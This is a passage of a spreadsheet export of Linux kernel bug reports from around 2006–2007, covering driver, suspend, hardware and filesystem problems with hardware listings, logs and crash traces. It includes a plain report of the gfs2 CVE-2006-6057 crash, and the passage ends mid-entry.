    <t>Most recent kernel where this bug did *NOT* occur: 2.6.16.11 (lat one I tried) Distribution: Debian Hardware Environment:Pentium P4, Kingston DDR 333Mhz 2X512MB, Gigabyte GA-8PE667 Motherboard Software Environment:Manually compiled kernel Problem Description: From time to time (once per three power-ups maybe) i get en error: hdb: status error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hdb: drive not ready for command And after that strange things happen - some libraries fail to load reporting access denied or that they not exist. The strange thing is that I seem to have to power my machine down completely to get rid of this bug. Steps to reproduce: Power up (non-deterministic)</t>
  </si>
  <si>
    <t>intel-rng does not work when built into the kernel not as a module</t>
  </si>
  <si>
    <t>2.6.19 (and 2.6.18-gentoo-r4)</t>
  </si>
  <si>
    <t>2006-12-21 22:02 UTC</t>
  </si>
  <si>
    <t>Ominousfate</t>
  </si>
  <si>
    <t>2007-01-13 06:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.17 Distribution: Gentoo Hardware Environment: /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Celeron (Coppermine) stepping : 3 cpu MHz : 598.211 cache size : 128 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1197.43 lspci -vvv: 00:00.0 Host bridge: Intel Corporation 82810 GMCH [Graphics Memory Controller Hub] (rev 02) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 00:01.0 VGA compatible controller: Intel Corporation 82810 CGC [Chipset Graphics Controller] (rev 02) (prog-if 00 [VGA]) Subsystem: Intel Corporation 82810 CGC [Chipset Graphics Controller] Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 7 Region 0: Memory at ec000000 (32-bit, prefetchable) [disabled] [size=64M] Region 1: Memory at e8000000 (32-bit, non-prefetchable) [disabled] [size=512K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1e.0 PCI bridge: Intel Corporation 82801AB PCI Bridge (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 00003000-00003fff Memory behind bridge: e8100000-e9ffffff Prefetchable memory behind bridge: f0000000-f7ffffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corporation 82801AB ISA Bridge (LPC) (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corporation 82801AB IDE (rev 02) (prog-if 80 [Master]) Subsystem: Intel Corporation 82801AB IDE Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Region 4: I/O ports at 1800 [size=16] 00:1f.2 USB Controller: Intel Corporation 82801AB USB (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation 82801AB USB Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 11 Region 4: I/O ports at 1820 [size=32] 00:1f.3 SMBus: Intel Corporation 82801AB SMBus (rev 02) Subsystem: Intel Corporation 82801AB SMBus Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 9 Region 4: I/O ports at 1810 [size=16] 00:1f.5 Multimedia audio controller: Intel Corporation 82801AB AC'97 Audio (rev 02) Subsystem: Intel Corporation Unknown device 5643 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 9 Region 0: I/O ports at 1200 [size=256] Region 1: I/O ports at 1300 [size=64] 01:0b.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev b2) (prog-if 00 [VGA]) Subsystem: eVga.com. Corp. Unknown device b039 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 3 Region 0: Memory at e9000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at f0000000 (32-bit, prefetchable) [size=128M] [virtual] Expansion ROM at e8120000 [disabled] [size=64K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:0d.0 Ethernet controller: Lite-On Communications Inc LNE100TX (rev 21) Subsystem: Netgear FA310TX Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Interrupt: pin A routed to IRQ 9 Region 0: I/O ports at 3000 [size=256] Region 1: Memory at e8110000 (32-bit, non-prefetchable) [size=256] [virtual] Expansion ROM at e8140000 [disabled] [size=256K] 01:0e.0 Communication controller: Conexant HSF 56k Data/Fax Modem (rev 01) Subsystem: Mac System Co Ltd HP Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B+ Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Interrupt: pin A routed to IRQ 7 Region 0: Memory at e8100000 (32-bit, non-prefetchable) [size=64K] Region 1: I/O ports at 3400 [size=8] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Software Environment: Tested with 2.6.19 tarball directly from kernel.org and compiled with gcc version 4.1.1 (Gentoo 4.1.1-r1). But it also happens with this patched kernel version currently running: Linux version 2.6.18-gentoo-r4 (root@p4v1l10nC3l3r0n) (gcc version 4.1.1 (Gentoo 4.1.1-r1)) #6 Mon Dec 18 22:56:25 PST 2006 Problem Description: When intel-rng is built as a module the device works and /dev/hw_random is accessible. Also dmesg shows this line: Intel 82802 RNG detected. If intel-rng is built-in the kernel rather than as a module, the above line from dmesg is missing and /dev/hw_random is not accessible. This problem happens with the mainline kernel 2.6.19.1 from kernel.org and 2.6.18-gentoo-r4. I tested without loading any binary modules. Steps to reproduce: When configuring kernel set this as built-in rather than a module: Device Drivers-&gt;Character devices-&gt;Intel Hardware Random Number Generator Support (Defined at drivers/char/hw_random/Kconfig:13). Workaround: Compile intel-rng as a module. Or use kernel 2.6.17 or earlier. Keywords: built-in character intel-rng hw_random i810 module random rng Side note: I think the patch to allow intel-rng to be built as a module was not present in 2.6.17 and earlier but is for 2.6.18 and above.</t>
  </si>
  <si>
    <t>Long resume time from s2ram, touchpad may not work properly</t>
  </si>
  <si>
    <t>2006-12-22 03:29 UTC</t>
  </si>
  <si>
    <t>Lex V. Ross</t>
  </si>
  <si>
    <t>2007-01-30 13:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.12 Distribution: Debian Testing (Etch) Hardware Environment: Dell Inspiron 5000 laptop Software Environment: KDE Problem Description: Resume from s2ram takes anywhere from 50s to 1mi, during that time the screen is blank with flashing cursor in the top left-hand corner. At the end, the screen flashes briefly, goes completely dark twice, and the system is finally resumed. Sometimes synaptics touchpad does not work after resume (not responding to tapping, no scrolling features) but thebuttons at the bottom of the touchpad do. ACPI gives the following error messages on resume from s2ram. &gt; Dec 18 17:09:01 mars kernel: ACPI: read EC, IB not empty &gt; Dec 18 17:09:01 mars kernel: ACPI: read EC, OB not full &gt; Dec 18 17:09:01 mars kernel: ACPI Exception (evregion-0424): AE_TIME, Returned &gt; by Handler for [EmbeddedControl] [20060707] &gt; Dec 18 17:09:01 mars kernel: ACPI Exception (dswexec-0458): AE_TIME, While &gt; resolving operands for [OpcodeName unavailable] [20060707] &gt; Dec 18 17:09:01 mars kernel: ACPI Error (psparse-0537): Method parse/execution &gt; failed [\_SB_.BAT0._BST] (Node c112ec34), AE_TIME &gt; Dec 18 17:09:01 mars kernel: ACPI Exception (acpi_battery-0206): AE_TIME, &gt; Evaluating _BST [20060707] There is no problem with standby mode (quick and clear resume and so on). and stanby looks just the same as suspend to ram: stopped disks, blinking "power" LED etc. Steps to reproduce: as root, run "s2ram -f" command. Different ACPI options make no difference.</t>
  </si>
  <si>
    <t>Microsoft Natural Ergonomic Keyboard 4000 has unsupported keys</t>
  </si>
  <si>
    <t>2.6.24.2</t>
  </si>
  <si>
    <t>2006-12-22 07:39 UTC</t>
  </si>
  <si>
    <t>Matthew Schultz</t>
  </si>
  <si>
    <t>2008-03-06 07:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: AMD64 Software Environment: AMD64 Problem Description: Is there any chance the kernel can support the Microsoft Ergonomic Keyboard 4000? There are buttons on the keyboard that xev doesn't recognize and in this case requires a kernel patch. The details are documented here: http://gentoo-wiki.com/HOWTO_Microsoft_Natural_Ergonomic_Keyboard_4000#Device_Interface Steps to reproduce: 1. Press a key on the keyboard that the kernel doesn't recognize like the zoom up or zoom down button. 2. Keycode is not output.</t>
  </si>
  <si>
    <t>gfs2 init_journal denial of service (CVE-2006-6057)</t>
  </si>
  <si>
    <t>2006-12-23 08:46 UTC</t>
  </si>
  <si>
    <t>2007-11-21 03:34 UTC</t>
  </si>
  <si>
    <t>I can't seem to find a patch to fix this security vuln. Apologies if I missed something. http://projects.info-pull.com/mokb/MOKB-15-11-2006.html Linux 2.6.x gfs2 filesystem code fails to properly handle corrupted data structures, leading to an exploitable denial of service issue when a crafted stream is being mounted. This particular vulnerability is caused by a NULL pointer dereference in the init_journal function. See the above URL for a fs image which can be used to reproduce this. [root@fedoravm ~]# uname -a Linux fedoravm 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:37:32 EDT 2006 i686 i686 i386 GNU/Linux GFS2 (built Oct 16 2006 14:39:08) installed BUG: unable to handle kernel NULL pointer dereference at virtual address 000002a c printing eip: d0be45a9 *pde = 00000000 Oops: 0000 [#1] SMP last sysfs file: /block/loop3/range Modules linked in: lock_nolock gfs2 hfs loop ipv6 sunrpc ip_conntrack_netbios_ns ipt_REJECT xt_state ip_conntrack nfnetlink xt_tcpudp iptable_filter ip_tables x _tables video sbs i2c_ec button battery asus_acpi ac parport_pc lp parport snd_ens1371 g ameport snd_rawmidi snd_ac97_codec snd_ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq sg snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm v mxnet(U) snd_timer floppy i2c_piix4 snd pcnet32 i2c_core ide_cd cdrom soundcore mii serio_raw snd_page_alloc pcspkr dm_snapshot dm_zero dm_mirror dm_mod ext3 jbd mp tspi scsi_transport_spi mptscsih sd_mod scsi_mod mptbase CPU: 0 EIP: 0060:[] Tainted: P VLI EFLAGS: 00010207 (2.6.18-1.2798.fc6 #1) EIP is at init_journal+0x57/0x3f5 [gfs2] eax: 00000000 ebx: 00000000 ecx: 00000001 edx: 00000000 esi: ca9f3000 edi: ca82b028 ebp: ca9f3000 esp: ca87bc94 ds: 007b es: 007b ss: 0068 Process mount.gfs2 (pid: 1929, ti=ca87b000 task=cfe232c0 task.ti=ca87b000) Stack: ca9f3000 d0bef9c0 cfe232c0 ca82b2d8 caae352c caae352c d0bd9ae2 caae352c 00000000 0000004d ca9f3000 00000000 00000003 ca82b1b4 00000003 ca82b028 d0bdba52 ca82b2d8 00000001 ca87bce4 caae352c 00000000 ca9f3000 ca82b028 Call Trace: [] init_inodes+0x54/0x1da [gfs2] [] fill_super+0x50e/0x632 [gfs2] [] get_sb_bdev+0xce/0x11c [] gfs2_get_sb+0x21/0x3e [gfs2] [] vfs_kern_mount+0x83/0xf6 [] do_kern_mount+0x2d/0x3e [] do_mount+0x5fa/0x66d [] sys_mount+0x77/0xae [] syscall_call+0x7/0xb DWARF2 unwinder stuck at syscall_call+0x7/0xb Leftover inexact backtrace: ======================= Code: 76 29 8d 85 9c 08 00 00 c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 2a 21 bf d0 e8 f0 11 84 ef 8b bd 20 04 00 00 e9 94 03 00 00 &lt;8b&gt; 80 ac 02 00 00 90 0f ba 68 08 02 8d 54 24 14 89 e8 e8 92 89 EIP: [] init_journal+0x57/0x3f5 [gfs2] SS:ESP 0068:ca87bc94</t>
  </si>
  <si>
    <t>integer values not immediately updated in xconfig display</t>
  </si>
  <si>
    <t>2.6.20-rc2</t>
  </si>
  <si>
    <t>2006-12-25 19:07 UTC</t>
  </si>
  <si>
    <t>2007-06-25 07:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: no idea. Distribution: SUSE Hardware Environment: dual core x86_64 Software Environment: Problem Description: When an integer config value is entered in xconfig (qconf), its new value is not updated on-screen until the menu is left (move to another menu) and then return to the menu with the changed value. Steps to reproduce: Applies to all editable integer values that I have tested, e.g., NR_CPUS, LOG_BUF_SHIFT, SECURITY_SELINUX_POLICYDB_VERSION_MAX_VALUE, IDE_MAX_HWIFS, BLK_DEV_RAM_SIZE, LEGACY_PTY_COUNT, MAX_RAW_DEVS. Edit the numeric value, change it, press Enter/Return. The value on the left side of the config line item remains at the old/previous value, while the value on the right side of the display contains the new value. When I move to a different config menu and then back to the changed menu, the value of the left side of the config line item contains the new value.</t>
  </si>
  <si>
    <t>Accented letters don't get capitalized by caps lock in unicode mode</t>
  </si>
  <si>
    <t>open/close loop causes disabled irq</t>
  </si>
  <si>
    <t>2006-12-28 13:46 UTC</t>
  </si>
  <si>
    <t>dann frazier</t>
  </si>
  <si>
    <t>2008-05-17 15:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown (is reproducible with 2.6.18.5 and 2.6.20-rc2) Distribution: Debian Hardware Environment: HP nc6000 laptop Software Environment: Problem Description: A Debian user reported that a simple program that repeatedly opens and closes a serial device will eventually cause an irq line to be disabled. Debian report: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=404815 I've also reproduced this on 2.6.20-rc2. Steps to reproduce: Run the attached program.</t>
  </si>
  <si>
    <t>no module gets loaded for Nvidia Mcp51 High Definition Audio</t>
  </si>
  <si>
    <t>2006-12-30 19:36 UTC</t>
  </si>
  <si>
    <t>darkwerdna</t>
  </si>
  <si>
    <t>2008-04-16 08:37 UTC</t>
  </si>
  <si>
    <t>2.6.19 no longer detects my Nvidia Mcp51 High Definition Audio. In earlier kernels it would detect the card and load modules, but no sound would come out of the head phone jack, or speaker. If more information is needed please ask.</t>
  </si>
  <si>
    <t>r8169 driver sends TCP packets shorter than 20 bytes, according to snort</t>
  </si>
  <si>
    <t>v2.6.20-rc3-ge22a9a8</t>
  </si>
  <si>
    <t>2007-01-02 00:39 UTC</t>
  </si>
  <si>
    <t>Leonard Norrgard</t>
  </si>
  <si>
    <t>2007-01-10 15:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: ? Distribution: Debian testing (Etch), but with git master kernel Hardware Environment: MSI K9A Platinum, which has both of these networking chips: Realtek RTL8110SC http://www.realtek.com.tw/search/default.aspx?keyword=RTL8110SC Realtek RTL8111B http://www.realtek.com.tw/search/default.aspx?keyword=RTL8111B Software Environment: 64-bit Problem Description: Sends TCP packets shorter than 20 bytes, according to snort Steps to reproduce: 0) Install snort 1) # tail -f /var/log/snort/alert 2) Point web browser at http://tomshardware.com 3) Snort logs many short TCP packets. Output in /var/log/snort/alert: [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:42.285601 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:42.286644 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:43.484722 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:43.485875 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:45.685176 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:45.685622 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:49.884532 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:49.884963 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:58.083339 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:44:58.083544 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:45:14.280559 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated [**] [116:45:1] (snort_decoder) TCP packet len is smaller than 20 bytes! [**] 01/02-09:45:14.280752 192.168.21.7:0 -&gt; 216.92.211.178:0 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:32 DF TCP header truncated</t>
  </si>
  <si>
    <t>2.6.20-rc3</t>
  </si>
  <si>
    <t>parport_pc fails to use EPP or ECP mode regardless of BIOS setting</t>
  </si>
  <si>
    <t>2.6.16 vanilla</t>
  </si>
  <si>
    <t>2007-01-03 09:48 UTC</t>
  </si>
  <si>
    <t>auxsvr</t>
  </si>
  <si>
    <t>2007-01-13 06:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur:NA Distribution:SuSE 10 Hardware Environment:P4 2.4GHz, Asus P4PE M/B, 1GB RAM, LaserJet 1100 on /dev/lp0 Software Environment:KDE, CUPS Problem Description: Kernel reports: parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE] parport0: irq 7 detected lp0: using parport0 (polling). regardless of the BIOS setting, which is EPP/ECP, DMA=3, IRQ=7 and the module settings. Steps to reproduce: Load parport_pc module. I must add that http://lists.infradead.org/pipermail/linux-parport/2005-April/000294.html and http://cyberelk.net/tim/parport/archive/current/5832.html describe the problem and indicate a solution, which is commenting out the check for an Intel bug in parport_pc, which solves the problem as indicated by dmesg output: parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE,EPP] parport0: irq 7 detected parport0: PC-style at 0x378 (0x778), irq 7, dma 3 [PCSPP,TRISTATE,COMPAT,EPP,ECP,DMA]</t>
  </si>
  <si>
    <t>No hardware rendering for "SuperSavage/IXC 64" and "Xorg 7.2 RC3"</t>
  </si>
  <si>
    <t>2.6.20-rc3-git3</t>
  </si>
  <si>
    <t>2007-01-04 00:23 UTC</t>
  </si>
  <si>
    <t>Joachim Frieben</t>
  </si>
  <si>
    <t>2007-06-02 04:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none Distribution: "Fedora Core [Development]" Hardware Environment: "IBM ThinkPad T23" Software Environment: n/a Problem Description: Obsolete kernel "DRM" modules in kernel "2.6.20-rc3-git3" inhibit hardware rendering for "SuperSavage/IXC 64". For the new upstream version 2.1.12 of the "savage" driver in "Xorg 7.2 RC3", "glxinfo" reports: "libGL error: drmMap of framebuffer failed (Invalid argument)" "libGL error: reverting to (slow) indirect rendering" This error was absent for driver version 2.1.11. Steps to reproduce: 1. Install "savage" driver version 2.1.12. 2. Restart "X". 3. Log in to "X" session and execute "glxinfo". Additional comment: After compiling the latest "drm.ko" and "savage.ko" from [http://anongit.freedesktop.org/git/mesa/drm] and loading them prior to starting the "X" server, hardware rendering is back and working as before.</t>
  </si>
  <si>
    <t>data corruption with Opteron CPUs and nvidia chipsets//memory hole mapping / iommu related bug?!</t>
  </si>
  <si>
    <t>at least until 2.6.18.1</t>
  </si>
  <si>
    <t>2007-01-04 04:56 UTC</t>
  </si>
  <si>
    <t>Christoph Anton Mitterer</t>
  </si>
  <si>
    <t>2007-08-21 02:50 UTC</t>
  </si>
  <si>
    <t>Hi. This bug is mainly discussed at lkml and for in depth informaiton you should probably read the whole thread(s) there. You can find the archive here: http://marc.theaimsgroup.com/?t=116502121800001&amp;r=1&amp;w=2 &lt;http://marc.theaimsgroup.com/?t=116502121800001&amp;r=1&amp;w=2&gt; Now a short description: -I (and many others) found a data corruption issue that happens on AMD Opteron / Nvidia chipset systems &lt;http://www.nvnews.net/vbulletin/showthread.php?t=82909#&gt;. -What happens: If one reads/writes large amounts of data there are errors. We test this the following way: Create some test data (huge amounts of),.. make md5sums of it (or with other hash algorithms), then verify them over and over. The test shoes differences (refer the lkml thread for more information about this). Always at differnt files (!!!!). It may happen at read AND write access &lt;http://www.nvnews.net/vbulletin/showthread.php?t=82909#&gt;. Note that even for affected users the error occurs rarely (but this is of course still far to often): My personal tests shows about the following: Test data: 30GB (of random data), I verify sha512sum 50 times (that is what I call one complete test). So I verify 30*50GB. In one complete test there are about 1-3 files with differences. With about 100 corrupted bytes (at leas very low data sizes, far below an MB) -It probably happens with all the nforce chipsets (see the lkml thread where everybody tells his hardware) -The reasons are not single hardware defects (dozens of hight quality memory &lt;http://www.nvnews.net/vbulletin/showthread.php?t=82909#&gt;, CPU, PCI bus, HDD bad block scans, PCI parity, ECC, etc. tests showed this, and even with different hardware compontents the issue remained) -It is probably not an Operating System related bug, although Windows won't suffer from it. The reason therefore is, that windows is (too stupid) ... I mean unable to use the hardware iommu at all. -It happens with both, PATA and SATA disk. To be exact: It is may that this has nothing special to do with harddisks at all. It is probably PCI-DMA related (see lkml for more infos and reasons for this thesis). -Only users with much main memory (don't know the exact value by hard and I'm to lazy to look it up)... say 4GB will suffer from this problem. Why? Only users who need the memory hole mapping and the iommu will suffer from the problem (this is why we think it is chipset related). -We found two "workarounds" but these have both big problems: Workaround 1: Disable Memory Hole Mapping in the system BIOS at all. The issue no longer occurs, BUT you loose a big part of your main memory (depending on the size of the memhole, which itself depends on the PCI devices). In my case I loose 1,5GB from my 4GB. Most users will probably loose 1GB. =&gt; inacceptable Workaround 2: As told Windows won't suffer from the problem because it always uses an software iommu. (btw: the same applies for Intel CPUs with EMT64/Intel 64,.. these CPUs don't even have a hardware iommu). Linux is able to use the hardware iommu (which of course accelerates the whole system). If you tell the kernel (Linux) to use a software iommu (with the kernel parameter iommu=soft),.. the issue won't appear. =&gt; this is better than workaround 1 but still not really acceptable. Why? There are some following problems: The hardware iommu and systems with such big main memory is largely used in computing centres. Those groups won't abdicate the hwiommu in general, simply because some Opteron (and perhaps Athlon) / Nvidia combinations make problems. (I can tell this because I work at the Leibniz Supercomputing Centre,.. one of the largest in Europe) But as we don't know the exact reason for the issue, we cannot selectively switch the iommu=soft for affected mainboards/chipsets/cpu-steppings/and alike. We'd have to use a kernel wide iommu=soft as a catchall solution. But it is highly unlikely that this is accepted by the Linux community (not to talk about end users like the supercomputing centres) and I don't want to talk about other OS'es. Perhaps this might be solvable via BIOS fixes, but of course not by the stupid-solution "disable hwiommu via the BIOS". Perhaps the reason is a Linux kernel bug (although this is highly unlikely). Last but not least,.. perhaps this is AMD Opteron/Athlon (Note: These CPUs have the memory controllers directly integrated) issue and/or Nvidia nforce chipset issue. Regards, Chris. PS: Please post any other resources/links to threads about this or similar problems.</t>
  </si>
  <si>
    <t>cfi_cmdset_0002" [drivers/mtd/chips/gen_probe.ko] undefined!</t>
  </si>
  <si>
    <t>2.6.20-rc3-git4</t>
  </si>
  <si>
    <t>2007-01-05 02:35 UTC</t>
  </si>
  <si>
    <t>2007-04-28 06:35 UTC</t>
  </si>
  <si>
    <t>build failed with : ... BUILD arch/i386/boot/bzImage Root device is (3, 8) Boot sector 512 bytes. Setup is 4746 bytes. System is 1359 kB Kernel: arch/i386/boot/bzImage is ready (#1) Building modules, stage 2. MODPOST 242 modules WARNING: "cfi_cmdset_0002" [drivers/mtd/chips/gen_probe.ko] undefined! make[1]: *** [__modpost] Error 1 make: *** [modules] Error 2</t>
  </si>
  <si>
    <t>read the cycle time and system time simultaneously</t>
  </si>
  <si>
    <t>2007-01-05 03:39 UTC</t>
  </si>
  <si>
    <t>Pieter Palmers</t>
  </si>
  <si>
    <t>2007-02-21 03:29 UTC</t>
  </si>
  <si>
    <t>Libraw1394 at present requires an async write and read to get the cycle time. It would be nice if it was read directly from the kernel. Secondly, there is currently no function that reads the cycle time and system time simultaneously so that they are synchronized. It would be great if such a function existed so we could discover the exact receive time of an ISO packet and express it as a system time with microsecond accuracy.</t>
  </si>
  <si>
    <t>2.6.20-rc3-mm1 hangs before mounting root fs (xfs)</t>
  </si>
  <si>
    <t>2.6.20-rc3-mm1</t>
  </si>
  <si>
    <t>2007-01-05 10:30 UTC</t>
  </si>
  <si>
    <t>2007-02-06 11:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-rc2-mm1 Distribution: Gentoo Hardware Environment: i686, Athlon, 512MB Software Environment: binutils 2.17, gcc-4.1.1, glibc-2.5-r0 Steps to reproduce: Just booting 2.6.20-rc3-mm1 Problem Description: Hangs at boot, normaly the following is in dmesg (2.6.20-rc2-mm1): [ 26.688876] Testing NMI watchdog ... OK. [ 26.801379] Using IPI Shortcut mode [ 26.811986] ACPI: (supports&lt;6&gt;Time: tsc clocksource has been installed. [ 26.831943] Clock event device lapic disabled [ 26.845059] Clock event device pit configured with caps set: 08 [ 26.862841] Switched to high resolution mode on CPU 0 [ 26.878020] Time: acpi_pm clocksource has been installed. [ 26.894260] S0 S1 S4 S5) [ 26.963307] XFS mounting filesystem sdb6 [ 27.084331] VFS: Mounted root (xfs filesystem) readonly. [ 6.190000] Freeing unused kernel memory: 200k freed In case of 2.6.20-rc3-mm1 this is the complete dmesg and the output from SysRQ-T: [ 0.000000] Linux version 2.6.20-rc3-mm1 (root@ariolc) (gcc version 4.1.1 (Gentoo 4.1.1-r3)) #1 